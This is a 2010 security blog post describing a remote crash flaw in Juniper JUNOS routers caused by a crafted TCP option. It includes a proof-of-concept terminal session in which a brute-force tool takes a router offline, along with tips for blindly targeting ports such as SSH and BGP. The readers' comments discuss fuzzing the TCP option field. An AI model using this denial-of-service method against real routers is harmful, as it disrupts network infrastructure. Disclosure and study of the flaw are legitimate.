January 7, 2010

Juniper JUNOS Remote Kernel Crash Flaw!

"Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic." - The Register news.

The JunOS kernel will crash (i.e. core) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with Junos's firewall filter. A router receiving this specific TCP packet will crash and reboot.

Affected Devices:
JunOS 3.x - 10.x (versions released later then 1/28/2009)
Software releases built on or after January 28, 2009 have already fixed the issue.
Solution:
Upgrade the OS. There are no totally effective workarounds.

Funny:
"A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities."
"Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory," the spokeswoman wrote.
Ooohhh... How about this: "when a specifically crafted TCP option is received on a listening TCP port"?
It's more than enough! We have 256 guesses ;)

Simple Proof-of-Concept demo:

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
64 bytes from 169.254.1.1: icmp_seq=0 ttl=254 time=4.623 ms
64 bytes from 169.254.1.1: icmp_seq=1 ttl=254 time=4.531 ms
64 bytes from 169.254.1.1: icmp_seq=2 ttl=254 time=4.315 ms
^C<...>

hod# ./hod-junos-test 169.254.1.1 22
[*] Target IP: 169.254.1.1, Port: 22
[+] Sending TCP-packets with various crafted TCP options
[+] TCP options bruteforce progress:
[..........................................................
...........................................................
...........................................................
.......................................................]
[+] OK

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C

256 packets and JunOS router is dead, and after analyze sniffing traffic we are know true "evil" TCP packet!

The JUNOS firewall filter (ACL) is unable to filter a TCP packet with this issue!
Successful exploitation requires knowledge of a listening remote TCP port (opened or firewall filtered, it doesn't matter at all).
For example, attackers can send (blind) a many numbers of crafted packets to "well known" TCP ports (22/SSH, 179/BGP and other).
And That's enough.

63 comments:

  1. Are you just looping through the first 8 bits of the TCP options header? Looking at the ol' TCP header diagram here it looks like TCP options + padding has 32 bits to muck with.

    ReplyDelete
  2. Thx Ryan for comment.

    Of course, tcp options have a variable length.
    In the first testcase, i fuzzing only the option-kind octet:
    option-kind octet - fuzzing
    other octets - constants
    And of course, full fuzzing - is much more than 8 bits, but not long too.

    ReplyDelete
  3. Thanks!

    It was late when I tried this, but I see now that the options are variable length. I looped through all the values in the option-kind octet (assuming only one option here), with a value octet of x00, then I tried just plain leaving the value off. I could do some captures here, but am using Scapy and I betcha it is properly padding out the option field... this requires an improperly padded field right?

    ReplyDelete
  4. Also see this blog + video:
    http://www.toonk.nl/blog/?p=522
    seems that firewall filters do help to a certain extend.

    ReplyDelete
  5. This comment has been removed by a blog administrator.

    ReplyDelete
  6. This comment has been removed by a blog administrator.

    ReplyDelete
  7. This comment has been removed by a blog administrator.

    ReplyDelete
  8. This comment has been removed by a blog administrator.

    ReplyDelete
  9. This comment has been removed by a blog administrator.

    ReplyDelete
  10. This comment has been removed by a blog administrator.

    ReplyDelete
  11. This comment has been removed by a blog administrator.

    ReplyDelete
  12. This comment has been removed by a blog administrator.

    ReplyDelete
  13. This comment has been removed by a blog administrator.

    ReplyDelete
  14. This comment has been removed by a blog administrator.

    ReplyDelete
  15. This comment has been removed by a blog administrator.

    ReplyDelete
  16. This comment has been removed by a blog administrator.

    ReplyDelete
  17. This comment has been removed by a blog administrator.

    ReplyDelete
  18. This comment has been removed by a blog administrator.

    ReplyDelete
  19. This comment has been removed by a blog administrator.

    ReplyDelete
  20. This comment has been removed by a blog administrator.

    ReplyDelete
  21. This comment has been removed by a blog administrator.

    ReplyDelete
  22. This comment has been removed by a blog administrator.

    ReplyDelete
  23. This comment has been removed by a blog administrator.

    ReplyDelete
  24. This comment has been removed by a blog administrator.

    ReplyDelete
  25. This comment has been removed by a blog administrator.

    ReplyDelete
  26. This comment has been removed by a blog administrator.

    ReplyDelete
  27. This comment has been removed by a blog administrator.

    ReplyDelete
  28. This comment has been removed by a blog administrator.

    ReplyDelete
  29. This comment has been removed by a blog administrator.

    ReplyDelete
  30. This comment has been removed by a blog administrator.

    ReplyDelete
  31. This comment has been removed by a blog administrator.

    ReplyDelete
  32. This comment has been removed by a blog administrator.

    ReplyDelete
  33. This comment has been removed by a blog administrator.

    ReplyDelete
  34. This comment has been removed by a blog administrator.

    ReplyDelete
  35. This comment has been removed by a blog administrator.

    ReplyDelete
  36. This comment has been removed by a blog administrator.

    ReplyDelete
  37. This comment has been removed by a blog administrator.

    ReplyDelete
  38. This comment has been removed by a blog administrator.

    ReplyDelete
  39. This comment has been removed by a blog administrator.

    ReplyDelete
  40. This comment has been removed by a blog administrator.

    ReplyDelete
  41. This comment has been removed by a blog administrator.

    ReplyDelete
  42. This comment has been removed by a blog administrator.

    ReplyDelete
  43. This comment has been removed by a blog administrator.

    ReplyDelete
  44. This comment has been removed by a blog administrator.

    ReplyDelete
  45. This comment has been removed by a blog administrator.

    ReplyDelete
  46. This comment has been removed by a blog administrator.

    ReplyDelete
  47. This comment has been removed by a blog administrator.

    ReplyDelete
  48. This comment has been removed by a blog administrator.

    ReplyDelete
  49. This comment has been removed by a blog administrator.

    ReplyDelete
  50. This comment has been removed by a blog administrator.

    ReplyDelete
  51. This comment has been removed by a blog administrator.

    ReplyDelete
  52. This comment has been removed by a blog administrator.

    ReplyDelete
  53. This comment has been removed by a blog administrator.

    ReplyDelete
  54. This comment has been removed by a blog administrator.

    ReplyDelete
  55. This comment has been removed by a blog administrator.

    ReplyDelete
  56. This comment has been removed by a blog administrator.

    ReplyDelete
  57. This comment has been removed by a blog administrator.

    ReplyDelete
  58. This comment has been removed by a blog administrator.

    ReplyDelete
  59. This comment has been removed by a blog administrator.

    ReplyDelete
  60. This comment has been removed by a blog administrator.

    ReplyDelete
  61. This comment has been removed by a blog administrator.

    ReplyDelete
  62. This comment has been removed by a blog administrator.

    ReplyDelete
  63. This comment has been removed by a blog administrator.

    ReplyDelete